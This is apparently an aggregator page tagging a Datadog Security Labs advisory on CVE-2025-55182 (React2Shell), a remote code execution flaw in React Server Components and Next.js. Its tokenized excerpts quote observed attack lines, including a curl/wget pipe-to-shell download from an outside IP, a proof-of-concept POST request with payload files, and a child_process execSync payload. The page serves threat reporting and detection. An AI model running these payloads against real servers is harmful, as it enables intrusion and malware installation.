TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Datadog Security Labs

CVE-2025-55182 (React2Shell): Remote code execution in React Server Components and Next.js

2025-12-04 · Read original ↗

ATT&CK techniques detected

11 predictions
T1059.004Unix Shell
83%
“can use the following search to identify if one of your applications is affected. datadog app and api protection ( aap ) is also able to identify and block exploitation at runtime. datadog workload protection identifies exploitation attempts using a custom agent rule reproduced b…”
T1083File and Directory Discovery
70%
“", " / usr / bin / cksum ", " / usr / bin / comm ", " / usr / bin / csplit ", " / usr / bin / cut ", " / usr / bin / dircolors ", " / usr / bin / dirname ", " / usr / bin / du ", " / usr / bin / env ", " / usr / bin / expand ", " / usr / bin / expr ", " / usr / bin / factor ", " …”
T1190Exploit Public-Facing Application
66%
“cve - 2025 - 55182 ( react2shell ) : remote code execution in react server components and next. js key points and observations - on december 3, a remote code code execution ( rce ) vulnerability was identified in react server components and tracked as cve - 2025 - 55182. - under …”
T1190Exploit Public-Facing Application
65%
“##r / bin / curl ] then curl http : / / 141. 11. 240. 103 : 45178 / test. sh | sh else wget - qo - http : / / 141. 11. 240. 103 : 45178 / test. sh | sh fi ). tostring ( ). trim ( ) throw object. assign ( new error ( next _ redirect ) { digest : ` next _ redirect push / login? a =…”
T1046Network Service Discovery
61%
“december 3 around 10 p. m. utc. as of december 5, we continued to observe both scanning and exploitation activity and have identified over 800 ip addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. this activi…”
T1595.002Vulnerability Scanning
56%
“december 3 around 10 p. m. utc. as of december 5, we continued to observe both scanning and exploitation activity and have identified over 800 ip addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. this activi…”
T1083File and Directory Discovery
47%
“, " / bin / dd ", " / bin / df ", " / bin / dir ", " / bin / echo ", " / bin / ln ", " / bin / ls ", " / bin / mkdir ", " / bin / mknod ", " / bin / mktemp ", " / bin / mv ", " / bin / pwd ", " / bin / readlink ", " / bin / rm ", " / bin / rmdir ", " / bin / sleep ", " / bin / st…”
T1588.006Vulnerabilities
36%
“: constructor : constructor " } } } eof echo - n ' " $ @ 0 " ' > payload2. txt curl - x post http : / / localhost : 3000 - h " next - action : dontcare " \ - f " 0 = < payload. json " - f ' 1 = < payload2. txt ' \ - - max - time 2 2 > / dev / null | | true following execution, th…”
T1210Exploitation of Remote Services
35%
“december 3 around 10 p. m. utc. as of december 5, we continued to observe both scanning and exploitation activity and have identified over 800 ip addresses exhibiting scanning behavior that are attempting to exploit applications of at least two distinct organizations. this activi…”
T1587.004Exploits
32%
“: constructor : constructor " } } } eof echo - n ' " $ @ 0 " ' > payload2. txt curl - x post http : / / localhost : 3000 - h " next - action : dontcare " \ - f " 0 = < payload. json " - f ' 1 = < payload2. txt ' \ - - max - time 2 2 > / dev / null | | true following execution, th…”
T1059.006Python
30%
“] } { " id " : " vm # runinthiscontext ", " bound " : [ " console. log ( ' you have been hacked! ' ) ; process. mainmodule. require ( ' child _ process ' ). execsync ( ' echo dvkdlhirajxc78t5 ' ). tostring ( ) " ] } { " id " : " vm # runinnewcontext ", " bound " : [ " this. const…”

Summary

Learn more about the CVE-2025-55182 vulnerability affecting React Server Components and affecting Next.js.